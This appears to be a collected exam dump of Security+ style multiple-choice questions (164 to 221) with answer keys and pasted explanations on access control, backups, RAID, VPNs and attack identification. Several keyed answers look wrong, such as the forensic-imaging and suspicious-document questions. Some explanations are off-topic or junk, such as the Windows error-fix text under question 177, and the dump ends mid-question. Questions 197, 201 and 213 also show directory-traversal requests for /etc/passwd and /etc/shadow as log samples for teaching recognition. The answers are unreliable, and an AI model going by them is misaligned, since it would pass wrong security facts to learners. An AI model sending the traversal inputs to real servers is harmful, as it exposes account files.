> Gray box (or partially known environment) - the consultant is given some information; typically, this would resemble the knowledge of junior or non-IT staff to model particular types of insider threats. This type of test requires partial reconnaissance on the part of the tester. Gray box tests are useful for simulating the behavior of an unprivileged insider threat.

The terms black hat (unauthorized) and white hat (authorized) are used to distinguish these motivations. Of course, between black and white lie some shades of gray. A gray hat hacker (semi-authorized) might try to find vulnerabilities in a product or network without seeking the approval of the owner; but they might not try to exploit any vulnerabilities they find. A gray hat might seek voluntary compensation of some sort (a bug bounty), but will not use an exploit as extortion. A white hat hacker always seeks authorization to perform penetration testing of private and proprietary systems.

END
QUESTION 164
A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive's accounts. Which of the following security practices would have addressed the issue?

A. A non-disclosure agreement
B. Least privilege
C. An acceptable use policy
D. Offboarding

Answer: D

END
QUESTION 165
Which of the following provides the BEST protection for sensitive information and data stored in cloud-based services but still allows for full functionality and searchability of data within the cloud-based services?

A. Data encryption
B. Data masking
C. Anonymization
D. Tokenization

Answer: D

Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate to the production database. An authorized query or app can retrieve
the original value from the vault, if necessary, so tokenization is a reversible technique. Tokenization is used as a substitute for encryption, because from a regulatory perspective an encrypted field is the same value as the original data.

END
QUESTION 166
An organization has hired a security analyst to perform a penetration test. The analyst captures 1Gb worth of inbound network traffic to the server and transfers the pcap back to the machine for analysis. Which of the following tools should the analyst use to further review the pcap?

A. Nmap
B. Netstat
C. Netcat
D. Wireshark

Answer: D

A protocol analyzer (or packet analyzer) works in conjunction with a sniffer to perform traffic analysis. You can either analyze a live capture or open a saved capture (.pcap) file.

END
QUESTION 167
A system administrator needs to implement an access control scheme that will allow an object's access policy to be determined by its owner. Which of the following access control schemes BEST fits the requirements?

A. Role-based access control
B. Discretionary access control
C. Mandatory access control
D. Attribute-based access control

Answer: B

Discretionary access control (DAC) is based on the primacy of the resource owner. The owner is originally the creator of a file or service, though ownership can be assigned to another user. The owner is granted full control over the resource, meaning
that he or she can modify its access control list (ACL) to grant rights to others.

END
QUESTION 168
A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization's executives determine the next course of action?

A. An incident response plan
B. A communications plan
C. A disaster recovery plan
D. A business continuity plan

Answer: D

END
QUESTION 169
Company engineers regularly participate in a public Internet forum with other engineers throughout the industry. 
Which of the following tactics would an attacker MOST likely use in this scenario?

A. Watering-hole attack
B. Credential harvesting
C. Hybrid warfare
D. Pharming

Answer: A

With state actors, the concept of soft power refers to using diplomatic and cultural assets to achieve an objective. 
When deployed along with espionage, disinformation/fake news, and hacking, a hostile campaign can be characterized 
as hybrid warfare

END
QUESTION 170
A Chief Information Security Officer (CISO) is concerned about the organization's ability to continue business operations in the event of a prolonged DDoS attack on its local datacenter that consumes database resources. Which of the following will the CISO MOST likely recommend to mitigate this risk?

A. Upgrade the bandwidth available into the datacenter
B. Implement a hot-site failover location
C. Switch to a complete SaaS offering to customers
D. Implement a challenge response test on all end-user queries

Answer: B

END
QUESTION 171
After a ransomware attack, a forensics company needs to review a cryptocurrency transaction between the victim and the attacker. Which of the following will the company MOST likely review to trace this transaction?

A. The public ledger
B. The NetFlow data
C. A checksum
D. The event log

Answer: A

Banks commonly use ledgers to record transactions such as deposits and withdrawals and blockchain public ledgers are similar. The word block refers to pieces of digital information (the ledger), and chain refers to a public database. Together they create a database of public records. Each block has three parts: 
1. Information about a transaction, or transactions, such as the date, time, and amount. 
2. Information on the parties involved with the transaction(s). However, this doesn't include include actual names but instead uses a digital signature. 
3. A unique hash that distinguishes the block from other blocks. A block is added to the blockchain after four things happen: 
4. A transaction occurred. 
5. The transaction has been verified by a network of computers. 
6. The transaction is accurately recorded in a block. 
7. The block is assigned a unique hash. The block also includes the hash of the most recent block added just before it. This is what creates the chain. Every block has a unique hash, and every block has the hash of the block right before it. These connected hashes create the chain.

Netflow - A flow collector is a means of recording metadata and statistics about network traffic rather than recording each frame. Network traffic and flow data may come from a wide variety of sources (or probes), such as switches, routers, firewalls, web proxies, and so forth. 

END
QUESTION 172
An organization is concerned that its hosted web servers are not running the most updated version of the software. Which of the following would work BEST to help identify potential vulnerabilities?

A. Hping3 –s comptia.org –p 80
B. Nc -1 –v comptia.org –p 80
C. nmap comptia.org –p 80 –aV
D. nslookup –port=80 comptia.org

Answer: C

The tool hping3 allows you to send manipulated packets. This tool allows you to control the size, quantity and fragmentation of packets in order to overload the target and bypass or attack firewalls. Hping3 can be useful for security or capability testing purposes, using it you can test firewalls effectivity and if a server can handle a big amount of packets.

Netcat - An effective tool for testing connectivity available for both Windows and Linux. 
Netcat can be used for port scanning and fingerprinting.

END
QUESTION 173
A recent audit uncovered a key finding regarding the use of a specific encryption standard in a web application that is used to communicate with business customers. Due to the technical limitations of its customers the company is unable to upgrade the encryption standard. Which of the following types of controls should be used to reduce the risk created by this scenario?

A. Physical
B. Detective
C. Preventive
D. Compensating

Answer: D

compensating control - A security measure that takes on risk mitigation when a primary control fails or cannot completely meet expectations.

END
QUESTION 174
A security administrator checks the table of a network switch, which shows the following output:

VLAN	Physical adress		Type		Port
1		001a:42ff:5113		Dynamic		GE0/5
1		0faa:abcf:ddee		Dynamic		GE0/5
1		c6a9:6b16:758e		Dynamic		GE0/5
1		a3aa:b6a3:1212		Dynamic		GE0/5
1		8025:2ad8:bfac		Dynamic		GE0/5
1		b839:f995:a00a		Dynamic		GE0/5

Which of the following is happening to this switch?

A. MAC Flooding
B. DNS poisoning
C. MAC cloning
D. ARP poisoning

Answer: A

Where ARP poisoning is directed at hosts, MAC flooding is used to attack a switch. The intention of the attacker is to exhaust the memory used to store the switch's MAC address table. The switch uses the MAC address table to determine which port to use to forward unicast traffic to its correct destination. Overwhelming the table can cause the switch to stop trying to apply MAC-based forwarding and flood unicast traffic out of all ports, working as a hub. This makes sniffing network traffic easier for the threat actor.

END
QUESTION 175
Which of the following types of controls is a turnstile?

A. Physical
B. Detective
C. Corrective
D. Technical

Answer: A

END
QUESTION 176
A network engineer notices the VPN concentrator overloaded and crashes on days when there are a lot of remote workers. Senior management has placed greater importance on the availability of VPN resources for the remote workers than the security of the end users' traffic. Which of the following would be BEST to solve this issue?

A. iPSec
B. Always On
C. Split tunneling
D. L2TP

Answer: C

Always-On VPN
Traditional remote access VPN solutions require the user to initiate the connection and enter their authentication credentials. An always-on VPN means that the computer establishes the VPN whenever an Internet connection over a trusted network is detected, using the user's cached credentials to authenticate. Microsoft has an Always-On VPN solution for Windows Server and Windows 10 clients (docs.microsoft.com/en-us/windows-server/remote/remote-access/vpn/always-on-vpn/deploy/always-onvpn-
deploy-deployment) and an OpenVPN client can be configured to autoconnect (openvpn.net/vpn-server-resources/setting-your-client-to-automatically-connect-toyour- vpn-when-your-computer-starts).

Split Tunnel versus Full Tunnel
When a client connected to a remote access VPN tries to access other sites on the Internet, there are two ways to manage the connection:

> Split tunnel - the client accesses the Internet directly using its "native" IP configuration and DNS servers.

> Full tunnel - Internet access is mediated by the corporate network, which will alter the client's IP address and DNS servers and may use a proxy. Full tunnel offers better security, but the network address translations and DNS operations required may cause problems with some websites, especially cloud services. It also means more data is channeled over the link.

END
QUESTION 177 
A security analyst is performing a forensic investigation involving compromised account credentials. Using the Event Viewer, the analyst was able to detect the following message: "Special privileges assigned to new logon.' Several of these messages did not have a valid logon associated with the user before these privileges were assigned. Which of the following attacks is MOST likely being detected?

A. Pass-the-hash 
B. Buffer overflow
C. Cross-site scripting
D. Session replay

Answer: A

Fix Assign Special Privileges To New Logon Windows XP, Vista, 7 and 8 (pcrpr.com)

What causes Assign Special Privileges To New Logon error message?
Typically, the Assign Special Privileges To New Logon error code is a result of Windows system corruption. Missing system entries can be a serious danger to the well being of your personal computer.
There are several events which can cause system file errors. A partial installation, an incomplete file deletion, improper deletion of software or computer hardware. It could also be triggered in the event your system is infected by malware or adware attack or by an incorrect shut down of the pc. Any one of the above actions can end up in the removal or corruption of Windows system files. A damaged system file will result in absent or incorrectly linked documents and archives needed for the accurate operation of the software.
END
QUESTION 178
A security modern may have occurred on the desktop PC of an organization's Chief Executive Officer (CEO) A duplicate copy of the CEO's hard drive must be stored securely to ensure appropriate forensic processes and the chain of custody are followed. Which of the following should be performed to accomplish this task?

A. Install a new hard drive in the CEO's PC, and then remove the old hard drive and place it in a tamper-evident bag
B. Connect a write blocker to the hard drive. Then leveraging a forensic workstation, utilize the dd command in a live Linux environment to create a duplicate copy
C. Remove the CEO's hard drive from the PC, connect to the forensic workstation, and copy all the contents onto a remote file share while the CEO watches
D. Refrain from completing a forensic analysis of the CEO's hard drive until after the incident is confirmed, duplicating the hard drive at this stage could destroy evidence

Answer: D

END
QUESTION 179
A website developer is working on a new e-commerce website and has asked an information security expert for the most appropriate way to store credit card numbers to create an easy reordering process. Which of the following methods would BEST accomplish this goal?

A. Salting the magnetic strip information
B. Encrypting the credit card information in transit.
C. Hashing the credit card numbers upon entry.
D. Tokenizing the credit cards in the database

Answer: D

Tokenization is often used in credit card processing. The PCI Council defines tokenization as "a process by which the primary account number (PAN) is replaced with a surrogate value called a token. De-tokenization is the reverse process of redeeming a token for its associated PAN value.

END
QUESTION 180
Which of the following would be BEST to establish between organizations to define the responsibilities of each party, outline the key deliverables and include monetary penalties for breaches to manage third-party risk?

A. An ARO
B. An MOU
C. An SLA
D. A BPA

Answer: C

END
QUESTION 181
An engineer wants to access sensitive data from a corporate-owned mobile device. Personal data is not allowed on the device. Which of the following MDM configurations must be considered when the engineer travels for business?

A. Screen locks
B. Application management
C. Geofencing
D. Containerization

Answer: D

END
QUESTION 182
An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO MOST likely use?

A. An external security assessment
B. A bug bounty program
C. A tabletop exercise
D. A red-team engagement

Answer: C

END
QUESTION 183
An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sale systems The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load Which of the following are the BEST options to accomplish this objective'? (Select TWO)

A. Load balancing
B. Incremental backups
C. UPS
D. RAID
E. Dual power supply
F. NIC teaming

Answer: AD

END
QUESTION 184
A security administrator needs to create a RAID configuration that is focused on high read speeds and fault tolerance. It is unlikely that multiple drives will fail simultaneously. Which of the following RAID configurations should the administration use?

A. RAID 0
B. RAID 1
C. RAID 5
D. RAID 10

Answer: C

END
QUESTION 185
A database administrator needs to ensure all passwords are stored in a secure manner, so the administrator adds randomly generated data to each password string before hashing. Which of the following techniques BEST explains this action?

A. Predictability
B. Key stretching
C. Salting
D. Hashing

Answer: C

Key stretching (sometimes called key strengthening) is a technique used to increase the strength of stored passwords and can help thwart brute force and rainbow table attacks. Key stretching techniques salt the passwords with additional random bits to make them even more complex. Two common key stretching techniques are bcrypt and Password-Based Key Derivation
Function 2 (PBKDF2).

END
QUESTION 186
A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or attributes are being utilized in the authentication process? (Select TWO).

A. Something you know
B. Something you have
C. Somewhere you are
D. Someone you are
E. Something you are
F. Something you can do

Answer: AB

END
QUESTION 187
A public relations team will be taking a group of guests on a tour through the facility of a large e-commerce company. The day before the tour, the company sends out an email to employees to ensure all whiteboards are cleaned and all desks are cleared. The company is MOST likely trying to protect against.

A. Loss of proprietary information
B. Damage to the company's reputation
C. Social engineering
D. Credential exposure

Answer: A

END
QUESTION 188
A cybersecurity administrator has a reduced team and needs to operate an on-premises network and security infrastructure efficiently. To help with the situation, the administrator decides to hire a service provider. Which of the following should the administrator use?

A. SDP
B. AAA
C. IaaS
D. MSSP
E. Microservices

Answer: D

(MSSP) Managed Security Services Provider - a means of fully outsourcing responsibility for information assurance 
to a third party. This type of solution is expensive but can be a good fit for a Small and Medium-Sized Enterprise (SME) 
that has experienced rapid growth and has no in-house security capability.

SDP – Software Distribution Point

AAA – Authentication, Authorization and Accounting (Radius, TACACS+ and Diameter)

Microservice-based development shares many similarities with Agile software project management and the processes of continuous delivery and deployment. It also shares roots with the Unix philosophy that each program or tool should do one thing well. The main difference between SOA and microservices is that SOA (Service Orientated Architecture) allows a service to be
built from other services. By contrast, each microservice should be capable of being developed, tested, and deployed independently. The microservices are said to be highly decoupled rather than just loosely decoupled.

END
QUESTION 189
A small business just recovered from a ransomware attack against its file servers by purchasing the decryption keys from the attackers. The issue was triggered by a phishing email and the IT administrator wants to ensure it does not happen again. Which of the following should the IT administrator do FIRST after recovery?

A. Scan the NAS for residual or dormant malware and take new daily backups that are tested on a frequent basis.
B. Restrict administrative privileges and patch all systems and applications.
C. Rebuild all workstations and install new antivirus software
D. Implement application whitelisting and perform user application hardening

Answer: A

END
QUESTION 190
A security analyst is looking for a solution to help communicate to the leadership team about the severity levels of the organization's vulnerabilities. Which of the following would BEST meet this need?

A. CVE
B. SIEM
C. SOAR
D. CVSS

Answer: D

CVE (Common Vulnerabilities and Exposures) Scheme for identifying vulnerabilities developed by MITRE and adopted by NIST.

SOAR (security orchestration, automation, and response) A class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment.

CVSS (Common Vulnerability Scoring System) A risk management approach to quantifying vulnerability data and then
taking into account the degree of risk to different types of systems or information.

END
QUESTION 191
A document that appears to be malicious has been discovered in an email that was sent to a company's Chief Financial Officer (CFO). Which of the following would be BEST to allow a security analyst to gather information and confirm it is a malicious document without executing any code it may contain?

A. Open the document on an air-gapped network
B. View the document's metadata for origin clues
C. Search for matching file hashes on malware websites
D. Detonate the document in an analysis sandbox

Answer: B

See document question 191 for resource link.

END
QUESTION 192
An organization has a growing workforce that is mostly driven by additions to the sales department. Each newly hired salesperson relies on a mobile device to conduct business. The Chief Information Officer (CIO) is wondering if the organization may need to scale down just as quickly as it scaled up. The ClO is also concerned about the organization's security and customer privacy. Which of the following would be BEST to address the ClO's concerns?

A. Disallow new hires from using mobile devices for six months
B. Select four devices for the sales department to use in a CYOD model
C. Implement BYOD for the sales department while leveraging the MDM
D. Deploy mobile devices using the COPE methodology

Answer: C

END
QUESTION 193
An organization just experienced a major modern cyberattack. The attack was well coordinated, sophisticated and highly skilled. Which of the following targeted the organization?

A. Shadow IT
B. An insider threat
C. A hacktivist
D. An advanced persistent threat

Answer: D

END
QUESTION 194
Which of the following ISO standards is certified for privacy?

A. ISO 9001
B. ISO 27002
C. ISO 27701
D. ISO 31000

Answer: C

ISO 9001 is defined as the international standard that specifies requirements for a quality management system (QMS). Organizations use the standard to demonstrate the ability to consistently provide products and services that meet customer and regulatory requirements. It is the most popular standard in the ISO 9000 series and the only standard in the series to which organizations can certify.

ISO/IEC 27002 is an information security standard published by the International Organization for Standardization and by the International Electrotechnical Commission, titled Information technology – Security techniques – Code of practice for information security controls.

ISO/IEC 27701 Privacy Information Management System (PIMS) (formerly known as ISO/IEC 27552 during drafting period), helps organizations reconcile privacy regulatory requirements. The standard outlines a comprehensive set of operational controls that can be mapped to various regulations, including the GDPR. Once mapped, the PIMS operational controls are implemented by privacy professionals and audited by internal or third-party auditors resulting in a certification and comprehensive evidence of conformity.

ISO 31K - is an overall framework for enterprise risk management (ERM). ERM considers risks and opportunities beyond cybersecurity by including financial, customer service, competition, and legal liability factors. ISO 31K establishes best
practices for performing risk assessments.

END
QUESTION 195
A security analyst is investigating an incident that was first reported as an issue connecting to network shares and the internet. While reviewing logs and tool output, the analyst sees the following:

IP address		Physical address
10.0.0.1		00-18-21-ad-24-bc
10.0.0.114		01-31-a3-cd-23-ab
10.0.0.115		00-18-21-ad-24-bc
10.0.0.116		00-19-08-ba-07-da
10.0.0.117		01-12-21-ca-11-ad

Which of the following attacks has occurred?

A. IP conflict
B. Pass-the-hash
C. MAC flooding
D. Directory traversal
E. ARP poisoning

Answer: E

END
QUESTION 196
Under GDPR, which of the following is MOST responsible for the protection of privacy and website user rights?

A. The data protection officer
B. The data processor
C. The data owner
D. The data controller

Answer: D

Data controller - the entity responsible for determining why and how data is stored, collected, and used and for ensuring that these purposes and means are lawful. The data controller has ultimate responsibility for privacy breaches, and is not permitted to transfer that responsibility.

END
QUESTION 197
During an incident response, a security analyst observes the following log entry on the web server.

GET http://www.companysite.com/product_info.php?show=../../../../etc/passwd HTTP/1.1
Host: www.companysite.com

Which of the following BEST describes the type of attack the analyst is experiencing?

A. SQL injection
B. Cross-site scripting
C. Pass-the-hash
D. Directory traversal

Answer: D

Directory traversal is another type of injection attack performed against a web server. The threat actor submits a request for a file outside the web server's root directory by submitting a path to navigate to the parent directory (../). This attack can succeed if the input is not filtered properly and access permissions on the file are the same as those on the web server directory.

/etc/passwd is a plain text-based database that contains information for all user accounts on the system. It is owned by root and has 644 permissions . The file can only be modified by root or users with sudo privileges and readable by all system users.

END
QUESTION 198
An organization that is located in a flood zone is MOST likely to document the concerns associated with the restoration of IT operation in a:

A. business continuity plan
B. communications plan.
C. disaster recovery plan.
D. continuity of operations plan

Answer: A

CompTia Book

> Disaster recovery plan (DRP) - a disaster can be seen as a special class of incident where the organization's primary business function is disrupted. Disaster recovery requires considerable resources, such as shifting processing to a secondary site. Disaster
recovery will involve a wider range of stakeholders than less serious incidents.

> Business continuity plan (BCP) - this identifies how business processes should deal with both minor and disaster-level disruption. During an incident, a system may need to be isolated. Continuity planning ensures that there is processing
redundancy supporting the workflow, so that when a server is taken offline for security remediation, processing can failover to a separate system. If systems do not have this sort of planned resilience, incident response will be much more disruptive.

> Continuity of Operation Planning (COOP) - this terminology is used for government facilities, but is functionally similar to business continuity planning. In some definitions, COOP refers specifically to backup methods of performing mission functions without IT support.

Darril Gibson Book

A disaster recovery plan (DRP) includes a hierarchical list of critical systems and often prioritizes services to restore after an
outage. Testing validates the plan. The final phase of disaster recovery includes a review to identify any lessons learned and may
include an update of the plan.

Business continuity planning helps an organization predict and plan for potential outages of critical services or functions. The goal is to ensure that critical business operations continue and the organization can survive the outage. Organizations often create a business continuity plan (BCP). This plan includes disaster recovery elements that provide the steps used to return critical functions to operation after an outage. Disasters and outages can come from many sources, including:

> Fires
> Attacks
> Power outages
> Data loss from any cause
> Hardware and software failures
> Natural disasters, such as hurricanes, floods, tornadoes, and earthquakes

Addressing all of these possible sources takes a lot of time and effort. The goal is to predict the relevant disasters, their impact, and then develop recovery strategies to mitigate them. One of the first things an organization completes is a business impact analysis.

Continuity of operations planning focuses on restoring mission essential functions at a recovery site after a critical outage. 
For example, if a hurricane or other disaster prevents the company from operating in the primary location, the organization can continue to operate the mission essential functions at an alternate location that management previously identified as a recovery site. Failover is the process of moving mission essential functions to the alternate site.

END
QUESTION 199
A user reports constant lag and performance issues with the wireless network when working at a local coffee shop. A security analyst walks the user through an installation of Wireshark and gets a five-minute pcap to analyze. The analyst observes the following output:

See document question 199.

Which of the following attacks does the analyst MOST likely see in this packet capture?

A. Session replay
B. Evil twin
C. Bluejacking
D. ARP poisoning

Answer: B

Disassociation and Replay Attacks - The use of a rogue WAP may be coupled with a deauthentication attack. This sends a
stream of spoofed frames to cause a client to deauthenticate from a WAP. The deauth frames spoof the MAC address of the target station. This might allow the attacker to perform a replay attack aimed at recovering the network key or interpose a rogue WAP. A similar attack hits the target with disassociation packets, rather than fully deauthenticating the station. A disassociated station is not completely disconnected, but neither can it communicate on the network until it reassociates. Both attacks may
also be used to perform a denial of service attack against the wireless infrastructure. The attacks can be mitigated if the wireless infrastructure supports Management Frame Protection (MFP/802.11w). Both the WAP and clients must be configured to
support MFP.

END
QUESTION 200
A network administrator would like to configure a site-to-site VPN utilizing iPSec. The administrator wants the tunnel to be established with data integrity, encryption, authentication and anti- replay functions Which of the following should the administrator use when configuring the VPN?
 
A. AH
B. EDR
C. ESP
D. DNSSEC

Answer: C

END
QUESTION 201
A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicates a directory-traversal attack has occurred. Which of the following is the analyst MOST likely seeing?

A. http://sample.url.com/<script>Please-Visit-Our-Phishing-Site</script>
B. http://sample.url.com/someotherpageonsite/../../../etc/shadow
C. http://sample.url.com/select-from-database-where-password-null
D. http://redirect.sample.url.sampleurl.com/malicious-dns-redirect

Answer: B

END
QUESTION 202
A critical file server is being upgraded and the systems administrator must determine which RAID level the new server will need to achieve parity and handle two simultaneous disk failures. Which of the following RAID levels meets these requirements?

A. RAID 0+1
B. RAID 2
C. RAID 5
D. RAID 6

Answer: D

END
QUESTION 203
When selecting a technical solution for identity management, an architect chooses to go from an in-house to a third-party SaaS provider. Which of the following risk management strategies is this an example of?

A. Acceptance
B. Mitigation
C. Avoidance
D. Transference

Answer: D

END
QUESTION 204
The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours including an incident during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and work from high-risk countries while on holidays or work from a third-party organization in another country. The Chief information Officer (CIO) believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be BEST to mitigate CEO's concern? (Select TWO).

A. Geolocation
B. Time-of-day restrictions
C. Certificates
D. Tokens
E. Geotagging
F. Role-based access controls

Answer: AB

Geofencing refers to accepting or rejecting access requests based on location. Geofencing can also be used for push notification to send alerts or advice to a device when a user enters a specific area. Geotagging refers to the addition of location metadata to files or devices. This is often used for asset management to ensure devices are kept with the proper location.

END
QUESTION 205
A network engineer needs to create a plan for upgrading the wireless infrastructure in a large office. Priority must be given to areas that are currently experiencing latency and connection issues. Which of the following would be the BEST resource for determining the order of priority?

A. Nmap
B. Heat maps
C. Network diagrams
D. Wireshark

Answer: B

The coverage and interference factors mean that WAPs must be positioned and configured so that the whole area is covered, but that they overlap as little as possible. A site survey is used to measure signal strength and channel usage throughout the area to cover. A site survey starts with an architectural map of the site, with features that can cause background interference marked. These features include solid walls, reflective surfaces, motors, microwave ovens, and so on. The survey is performed with a Wi-Fi-enabled laptop or mobile device with Wi-Fi analyzer software installed. The Wi-Fi analyzer records information about the signal obtained at regularly spaced points as the surveyor moves around the area.

These readings are combined and analyzed to produce a heat map, showing where a signal is strong (red) or weak (green/blue), and which channel is being used and how they overlap. This data is then used to optimize the design, by adjusting transmit
power to reduce a WAP's range, changing the channel on a WAP, adding a new WAP, or physically moving a WAP to a new location.

END
QUESTION 206
A security analyst discovers several .jpg photos from a cellular phone during a forensics investigation involving a compromised system. The analyst runs a forensics tool to gather file metadata. Which of the following would be part of the images if all the metadata is still intact?

A. The GPS location
B. When the file was deleted
C. The total number of print jobs
D. The number of copies made

Answer: A

END
QUESTION 207
A smart switch has the ability to monitor electrical levels and shut off power to a building in the event of power surge or other fault situation. The switch was installed on a wired network in a hospital and is monitored by the facilities department via a cloud application. The security administrator isolated the switch on a separate VLAN and set up a patch routine. Which of the following steps should also be taken to harden the smart switch?

A. Set up an air gap for the switch.
B. Change the default password for the switch.
C. Place the switch In a Faraday cage.
D. Install a cable lock on the switch

Answer: B

END
QUESTION 208
Which of the following will provide the BEST physical security countermeasures to stop intruders? (Select TWO.)

A. Alarms
B. Signage
C. Lighting
D. Mantraps
E. Fencing
F. Sensors

Answer: DE

END
QUESTION 209
An organization's RPO for a critical system is two hours. The system is used Monday through Friday, from 9:00 am to 5:00 pm. Currently, the organization performs a full backup every Saturday that takes four hours to complete. Which of the following additional backup implementations would be the BEST way for the analyst to meet the business requirements?

A. Incremental backups Monday through Friday at 6:00 pm and differential backups hourly
B. Full backups Monday through Friday at 6:00 pm and incremental backups hourly.
C. incremental backups Monday through Friday at 6:00 pm and full backups hourly.
D. Full backups Monday through Friday at 6:00 pm and differential backups hourly.

Answer: D

END
QUESTION 210
A software developer needs to perform code-execution testing, black-box testing, and non-functional testing on a new product before its general release. Which of the following BEST describes the tasks the developer is conducting?

A. Verification
B. Validation
C. Normalization
D. Staging

Answer: A

An application model is a statement of the requirements driving the software development project. The requirements model is tested using processes of verification and validation (V&V):

> Verification is a compliance testing process to ensure that the product or system meets its design goals.

> Validation is the process of determining whether the application is fit-for-purpose
(so for instance, its design goals meet the user requirements).

Normalization - Where an application accepts string input, the input should be subjected to normalization procedures before being accepted. Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. This ensures that the string is in a format that can be processed correctly by the input validation routines.
When user-generated strings are passed through different contexts in a web application - between HTTP, JavaScript, PHP, and SQL for instance - each with potentially different canonicalization schemes, it is extremely difficult to ensure that characters that would facilitate script injection by XSS have been rendered safe. 

END
QUESTION 211
A user recently entered a username and password into a recruiting application website that had been forged to look like the legitimate site. Upon investigation, a security analyst identifies the following:

> The legitimate websites IP address is 10.1.1.20 and eRecruit local resolves to the IP.

> The forged website's IP address appears to be 10.2.12.99. based on NetFlow records

> All three of the organization's DNS servers show the website correctly resolves to the legitimate IP
> DNS query logs show one of the three DNS servers returned a result of 10.2.12.99 (cached) at the approximate time of the suspected compromise.

Which of the following MOST likely occurred?

A. A reverse proxy was used to redirect network traffic
B. An SSL strip MITM attack was performed
C. An attacker temporarily pwned a name server
D. An ARP poisoning attack was successfully executed

Answer: C

Have I been Pwned? (mystrikingly.com)

What is pwned? - Lets set it straight.. In jargon, pwn means to compromise or control, specifically another computer (server or PC), website, gateway device, or application.

A Secure Sockets Layer (SSL) strip attack is launched against clients on a local network as they try to make connections to websites. The threat actor must first perform a Man-in-the-Middle attack via ARP poisoning to masquerade as the default gateway. When a client requests an HTTP site that redirects to an HTTPS site in an unsafe way, the sslstrip utility (tools.kali.org/information-gathering/sslstrip) proxies the request and response, serving the client the HTTP site, hopefully with an unencrypted login form. If the user enters credentials, they will be captured by the threat actor. Sites can use the HTTP Strict Transport Security (HSTS) lists maintained by browsers to prevent clients requesting HTTP in the first place.

END
QUESTION 212
Which of the following describes the BEST approach for deploying application patches?

A. Apply the patches to systems in a testing environment then to systems in a staging environment, and finally to production systems.
B. Test the patches in a staging environment, develop against them in the development environment, and then apply them to the production systems
C. Test the patches in a test environment. Apply them to the production systems and then apply them to a staging environment
D. Apply the patches to the production systems apply them in a staging environment, and then test all of them in a testing environment

Answer: A

END
QUESTION 213
A security analyst sees the following log output while reviewing web logs:

[02/Feb/2019:03:39:21 -0000] 23.35.212.99 12.59.34.88 - "GET /uri/input.action?query=%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.0* 80 200 200
[02/Feb/2019:03:39:85 -0000] 23.35.212.99 12.59.34.88 - "GET /uri/input.action?query=/../../../etc/passwd HTTP/1.0* 80 200 200

Which of the following mitigation strategies would be BEST to prevent this attack from being successful?

A. Secure cookies
B. Input validation
C. Code signing
D. Stored procedures

Answer: B

Stored procedures are a group of SQL statements that execute as a whole and help prevent SQL injection attacks.

END
QUESTION 214
A company has limited storage available and online presence that cannot go down for more than four hours. 
Which of the following backup methodologies should the company implement to allow for the FASTEST database restore time 
in the event of a failure, while being mindful of the limited available storage space?

A. Implement full tape backup every Sunday at 8:00 pm and perform nightly tape rotations.
B. Implement differential backups every Sunday at 8:00 and nightly incremental backups at 8:00 pm
C. Implement nightly full backups every Sunday at 8:00 pm
D. Implement full backups every Sunday at 8:00 pm and nightly differential backups at 8:00 pm

Answer: D

END
QUESTION 215
An organization wants to implement a third factor to an existing multifactor authentication. The organization already uses a smart card and password. Which of the following would meet the organization's needs for a third factor?

A. Date of birth
B. Fingerprints
C. PIN
D. TPM

Answer: B

END
QUESTION 216
A consultant is configuring a vulnerability scanner for a large, global organization in multiple countries. The consultant will be using a service account to scan systems with administrative privileges on a weekly basis, but there is a concern that hackers could gain access to the account and pivot through the global network. Which of the following would be BEST to help mitigate this concern?

A. Create consultant accounts for each region, each configured with push MFA notifications.
B. Create one global administrator account and enforce Kerberos authentication
C. Create different accounts for each region. Limit their logon times and alert on risky logins
D. Create a guest account for each region. remember the last ten passwords, and block password reuse

Answer: A

Using Push Notifications for MFA - JumpCloud

Push Notifications
While there are several other forms of MFA, such as knowledge or location-based challenges, the final method we'll address is push notification-based MFA. Like TOTP, push notifications fall under the “On-Device Prompt” classification, meaning it's significantly more secure than using a set of credentials alone.
But unlike TOTP, push notifications utilize smartphone notifications to assert authentication. In doing so, end users simply have to press a button on their phone to approve or deny access. If an unauthorized party attempts to access their account, they can deny them outright. End users generally find this method of MFA to be convenient. Additionally, push notification-based MFA provides increased levels of security compared to SMS MFA while avoiding the hassles of implementing physical keys.
The downside of Push Notifications is that it requires another app on your phone. Many end users are reluctant to add additional applications, so this can stunt the roll-out of Push-based MFA.
As a potentially “best of all worlds” type of MFA, push notifications are growing in popularity. So, the END
QUESTION becomes, how can organizations enforce the use of push notifications for MFA?

END
QUESTION 217
A company recently moved sensitive videos between on-premises company-owned websites. The company then learned the videos had been uploaded and shared to the internet. Which of the following would MOST likely allow the company to find the cause?

A. Checksums
B. Watermarks
C. Order of volatility
D. A log analysis
E. A right-to-audit clause

Answer: D

END
QUESTION 218
A security analyst has received an alert about PII being sent via email. The analyst's Chief information Security Officer (CISO) has made it clear that PII must be handled with extreme care. From which of the following did the alert MOST likely originate?

A. S/MIME
B. DLP
C. IMAP
D. HIDS

Answer: B

END
QUESTION 219
A security analyst discovers that a company's username and password database was posted on an internet forum. 
The username and passwords are stored in plain text. 
Which of the following would mitigate the damage done by this type of data exfiltration in the future?

A. Create DLP controls that prevent documents from leaving the network
B. Implement salting and hashing
C. Configure the web content filter to block access to the forum.
D. Increase password complexity requirements

Answer: B

END
QUESTION 220
A well-known organization has been experiencing attacks from APIs. The organization is concerned that custom malware 
is being created and emailed into the company or installed on USB sticks that are dropped in parking lots. 
Which of the following is the BEST defense against this scenario?

A. Configuring signature-based antivirus to update every 30 minutes
B. Enforcing S/MIME for email and automatically encrypting USB drives upon insertion.
C. Implementing application execution in a sandbox for unknown software.
D. Fuzzing new files for vulnerabilities if they are not digitally signed

Answer: C

END
QUESTION 221
A malicious actor recently penetrated a company's network and moved laterally to the datacenter. 
